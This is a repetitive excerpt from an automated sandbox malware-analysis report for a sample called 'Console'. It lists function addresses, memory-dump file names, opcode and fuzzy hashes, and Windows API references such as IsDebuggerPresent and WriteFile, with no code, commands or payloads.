                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(80131506,016371B8), ref: 011852BB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebuggerPresent
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1347740429-0
                                                                                                                                                                                                                          • Opcode ID: b2e08493be417310f33e72d13c8466f8b37dc59a0da697c53dbefb7ca1f1a381
                                                                                                                                                                                                                          • Instruction ID: 7e201a833e8648d5f6cb41adeace3802f284d4bceb14514db6d6da2d42fe0710
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2e08493be417310f33e72d13c8466f8b37dc59a0da697c53dbefb7ca1f1a381
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9DF0A730540204C7F77EB9AC780C3653B97F702305F044559EE04C6294FF668464CB82
                                                                                                                                                                                                                          Function 01075480 Relevance: .5, Instructions: 530COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 871d84a0581442fd63b7df19c668c6400d4112faf7641d7e46a9f7408f8c3b27
                                                                                                                                                                                                                          • Instruction ID: 9d97403b945eb0f35fbb2b979d4ab1d6822614902bdc6ef0ba2892f9522a0559
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 871d84a0581442fd63b7df19c668c6400d4112faf7641d7e46a9f7408f8c3b27
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF228D7160434A8FCB15CF28C880A9EBBE6FF95714F148A5DE9958B346C731E805CBA6
                                                                                                                                                                                                                          Function 0107D680 Relevance: .5, Instructions: 517COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 05bd10ee878b1c7f9e528b7b5077e3d37c65fa5e04c330ad0ff8613cb6832100
                                                                                                                                                                                                                          • Instruction ID: 74ab9071fa07e47a9bf390567d3edd920d52f9e7b591da1249e8e7b30d133057
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05bd10ee878b1c7f9e528b7b5077e3d37c65fa5e04c330ad0ff8613cb6832100
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5212DE74E0460A9FDB59CFA8C4887BDFBE2FF48310F18819AC89997391D735A911CB94
                                                                                                                                                                                                                          Function 0101F110 Relevance: .4, Instructions: 370COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1357844191-0
                                                                                                                                                                                                                          • Opcode ID: 59a3fccb099378106c58c3286b3af603ba6663ce6ce2d88dbaff5ffd7f8d6d1c
                                                                                                                                                                                                                          • Instruction ID: 5f7f1e4d354840bdf4640c843c011685b7a279178b1b3b0dc789469464c23b77
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59a3fccb099378106c58c3286b3af603ba6663ce6ce2d88dbaff5ffd7f8d6d1c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02C150B07242216BDF4D976CECA1A3A36DAF798200F501A2CFD57DB2C8DB119C25C795
                                                                                                                                                                                                                          Function 014783F0 Relevance: .3, Instructions: 299COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 79cfd8f66544b8eb793437f110ad78ce9e358c4de057f07c7a108d763eab56b4
                                                                                                                                                                                                                          • Instruction ID: 9fb253beef8c5817ec6652e86579beaf3385ffe6a9551dbca74b47cf3b18cc99
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79cfd8f66544b8eb793437f110ad78ce9e358c4de057f07c7a108d763eab56b4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7ED14F51C5CBC996E6138B3D88421E2F3E1BEFA259F19E70AFDA435131EB3162C68741
                                                                                                                                                                                                                          Function 0146B180 Relevance: .3, Instructions: 289COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: a329d6992bb441cf1f2887e8e5536afff1a855a9d72b4a809cea699ce1e0c99f
                                                                                                                                                                                                                          • Instruction ID: 00bb3515e612ffa77d2b151f865204881b794f4ed0fccef33fb27fea67905bf7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a329d6992bb441cf1f2887e8e5536afff1a855a9d72b4a809cea699ce1e0c99f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13C10B35910164CFE768CF5EE8C043A7BF1EB8B301746415ADA55EB289C238E619EBE0
                                                                                                                                                                                                                          Function 010A22D0 Relevance: .3, Instructions: 273COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 74fdfae21c4ea310731ef8a176322d8cae93e49d4e083fadc8ca9a9bc8c0ce17
                                                                                                                                                                                                                          • Instruction ID: 6fcaf24d4fe43aa28dbcea298d3329cd0497993d2697eda5eecd8bd59423b543
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74fdfae21c4ea310731ef8a176322d8cae93e49d4e083fadc8ca9a9bc8c0ce17
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51917A72E001244FEB14CEBD88513BDFBE2AF85220F59827AD9E6EB281D635D9068750
                                                                                                                                                                                                                          Function 0109D260 Relevance: .2, Instructions: 167COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 08be4fc48e24642e9783f06dcfae698f8b26d2ba53fafb591dfed3f22b175f8d
                                                                                                                                                                                                                          • Instruction ID: 040757fca13bdbd8d8d3551da96c905a7edbd16af4f55ebf4fbf4f748c852fde
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08be4fc48e24642e9783f06dcfae698f8b26d2ba53fafb591dfed3f22b175f8d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8515976A002198FDF08DF59C8906ADF7B6FF89310B19817ED946EB354D730A941CB91
                                                                                                                                                                                                                          Function 0131E730 Relevance: .2, Instructions: 166COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: e2ac6f4b59cd07a4f48d6373b19cd8f96a9863c5ac67c5654eec79815b342447
                                                                                                                                                                                                                          • Instruction ID: b46f35b891bc6295d123cf56cb35861a6c1f9c2eea6024095cdc28ca9616d778
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2ac6f4b59cd07a4f48d6373b19cd8f96a9863c5ac67c5654eec79815b342447
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD51B953008B9586F3BB4A38C1153A3EFE65B12338F5CC96DD9E74AE87C25E9548D312
                                                                                                                                                                                                                          Function 010AB050 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 55f906cfb8ea85653706a1bd0f0444aad659abe48257e242271debf444edd29b
                                                                                                                                                                                                                          • Instruction ID: ed82389b8b71689c3ba5310aac6cae3438bce24e1233961cc08706d896adb8c9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55f906cfb8ea85653706a1bd0f0444aad659abe48257e242271debf444edd29b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12212C72A0493243F76DC9699890673F6E3FFC460178BC27DE9A39B648D735A841C2C4
                                                                                                                                                                                                                          Function 01478270 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 7aed97328beb133a5943182d58b292f6c166f06c1b3c4e8f5a8ec0d34920894b
                                                                                                                                                                                                                          • Instruction ID: 5c8707d76f380c7ea288facba875244f0a74838c6c003fd69e99df219d0c3eaa
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7aed97328beb133a5943182d58b292f6c166f06c1b3c4e8f5a8ec0d34920894b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15F090B6908605AFE724CF9DEC41B96FBE8F708324F00966FE419E3744D37268608B80
                                                                                                                                                                                                                          Function 01229A40 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4c0459424f1116aad770ded283a34064420ff478638f7431598b181d6a31c336
                                                                                                                                                                                                                          • Instruction ID: 515e982fcc113093bc8b9341a6cdcd2dd9e3cb9215dfa8f3b5e9b2f25e208636
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c0459424f1116aad770ded283a34064420ff478638f7431598b181d6a31c336
                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                          Function 0109CA60 Relevance: 94.9, APIs: 39, Strings: 15, Instructions: 389filestringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 0109CAC4
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CAD8
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000), ref: 0109CAED
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 0109CB0D
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CB21
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000), ref: 0109CB36
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 0109CB56
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CB6A
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000), ref: 0109CB7F
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 0109CB9F
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CBB3
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000), ref: 0109CBC8
